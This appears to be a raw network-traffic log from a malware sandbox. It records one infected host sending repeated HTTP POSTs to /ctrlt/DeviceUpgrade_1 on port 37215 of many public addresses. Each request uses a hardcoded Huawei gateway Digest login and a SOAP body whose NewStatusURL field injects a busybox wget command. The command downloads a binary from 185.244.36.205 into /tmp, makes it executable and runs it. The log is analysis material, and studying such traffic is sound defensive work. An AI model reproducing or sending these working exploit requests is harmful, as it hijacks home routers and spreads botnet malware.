                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2119192.168.2.1538498122.73.3.13237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.105276108 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2120192.168.2.1548842148.208.90.17937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.105284929 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2121192.168.2.1539758222.124.241.10837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.105287075 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2122192.168.2.1548954186.53.81.9737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.105288029 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2123192.168.2.1558596122.225.194.5937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.105324984 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2124192.168.2.1557770122.105.210.17137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.105326891 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2125192.168.2.1535882186.86.207.6937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.105372906 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2126192.168.2.1545868156.27.134.4937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.105380058 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2127192.168.2.1534026156.219.7.6237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.105380058 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2128192.168.2.155515831.37.167.8737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.105392933 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2129192.168.2.154548694.231.143.6137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.119692087 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
